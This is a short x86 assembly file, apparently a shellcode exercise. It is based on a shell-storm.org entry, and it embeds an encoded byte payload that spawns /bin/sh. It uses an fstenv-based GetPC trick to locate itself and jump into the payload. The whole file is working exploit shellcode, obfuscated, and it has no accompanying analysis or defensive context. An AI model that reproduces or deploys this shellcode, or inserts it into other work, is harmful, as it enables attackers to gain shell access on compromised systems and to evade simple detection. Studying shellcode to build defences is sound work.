;Shellcode obfuscation
;http://shell-storm.org/shellcode/files/shellcode-863.php
;shellcode spawns a /bin/sh shell
;leverages a getpc technique
global _start
section .text
_start:
    	fldz
	jmp short call_shellcode
	message: db 0xeb,0x25,0x5e,0x89,0xf7,0x31,0xc0,0x50,0x89,0xe2,0x50,0x83,0xc4,0x03,0x8d,0x76,0x04,0x33,0x06,0x50,0x31,0xc0,0x33,0x07,0x50,0x89,0xe3,0x31,0xc0,0x50,0x8d,0x3b,0x57,0x89,0xe1,0xb0,0x0b,0xcd,0x80,0xe8,0xd6,0xff,0xff,0xff,0x2f,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68

call_shellcode:
    	fstenv [esp-0xc]
    	pop ebp
	lea eax, [ebp+4]
	jmp eax
